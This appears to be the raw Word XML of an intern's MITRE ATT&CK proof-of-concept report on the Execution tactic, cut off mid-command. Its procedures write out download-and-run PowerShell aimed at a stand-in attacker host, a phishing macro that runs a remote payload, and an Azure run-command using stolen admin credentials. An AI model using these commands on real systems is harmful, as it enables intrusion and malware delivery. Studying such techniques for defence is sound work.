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74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intern Name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Riya Bhutal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intern ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 248</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:t> 2-08-2025</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task Title:</w:t>
      </w:r>
      <w:r w:rsidR="00660D97">
        <w:t xml:space="preserve"> MITRE ATTA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CK </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PoC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — Execution Tactic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="tactic-execution-ta0002"/>
      <w:r>
        <w:t>🌟</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tactic: Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The adversary’s goal is to run malicious code on a target system. This PoC outlines various methods attackers may use to achieve code execution during a cyber intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRPr="00EA144E" w:rsidRDefault="0044007E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="techniques-used"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⚙</w:t>
      </w:r>
      <w:r>
        <w:t>️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Techniques Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="t1059-command-and-scripting-interpreter"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059 – Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Attackers use scrip</w:t>
      </w:r>
      <w:r>
        <w:t>ts (like PowerShell or bash) to execute arbitrary commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="t1204.002-user-execution-malicious-file"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Attackers trick users into executing malicious files, like macro-laden Word documents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="t1651-cloud-administration-command"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1651 – Cloud Administration Command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Attackers use legitimat</w:t>
      </w:r>
      <w:r>
        <w:t>e cloud management tools (e.g., Azure RunCommand or AWS SSM) to run commands remotely on VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="procedures"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>📄</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="procedure-1-powershell-execution-t1059"/>
      <w:r>
        <w:t>Procedure 1 — PowerShell Execution (T1059):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRDefault="00EA144E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA144E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5260AA2C" wp14:editId="7324A2E7">
            <wp:extent cx="5943600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4E" w:rsidRDefault="00EA144E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRDefault="00EA144E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRDefault="00EA144E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRDefault="00EA144E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRDefault="004A40DC" w:rsidP="00EA144E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6250F7" wp14:editId="20C8F5F7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3724275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="11957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3 1553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9A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F6EA091" wp14:editId="0212BAF6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3105150" cy="33978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44E" w:rsidRPr="00EA144E" w:rsidRDefault="00EA144E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA144E" w:rsidRDefault="0044007E" w:rsidP="00EA144E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a PowerShell script named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>oad.ps1</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRPr="0044007E" w:rsidRDefault="0044007E" w:rsidP="0044007E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> http</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Start-Process</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Send it as a download link to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victim executes it using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecutionPolicy Bypass </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>File payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="Xfd28f4b989f4b583ed2acaed0f1e2ddc1746079"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> Procedure 2 — Macro-based Malicious File (T1204.002):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a Word document with </w:t>
      </w:r>
      <w:r>
        <w:t>an embedded macro:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRPr="0044007E" w:rsidRDefault="0044007E" w:rsidP="0044007E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Shell "powershell.exe -ExecutionPolicy Bypass -File \\attacker\payload.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Send to the user via email, asking them to enable macros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When opened, the macro downloads and executes the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="procedure-3-cloud-execution-t1651"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> Procedure 3 — Cloud Execution (T1651):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using stolen cloud admin credentials, log into Azure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRPr="0044007E" w:rsidRDefault="0044007E" w:rsidP="0044007E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> run-command invoke </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-g</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> ResourceGroup </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> VictimVM </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>--command-id</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> RunPowerShellScript </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>--scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>"Invoke-WebRequest http://attacker/malware.exe -OutFile C:</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>temp</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>malware.exe; Start-Process C:</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>temp</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ma</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>lware.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>For AWS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRPr="0044007E" w:rsidRDefault="0044007E" w:rsidP="0044007E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ssm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
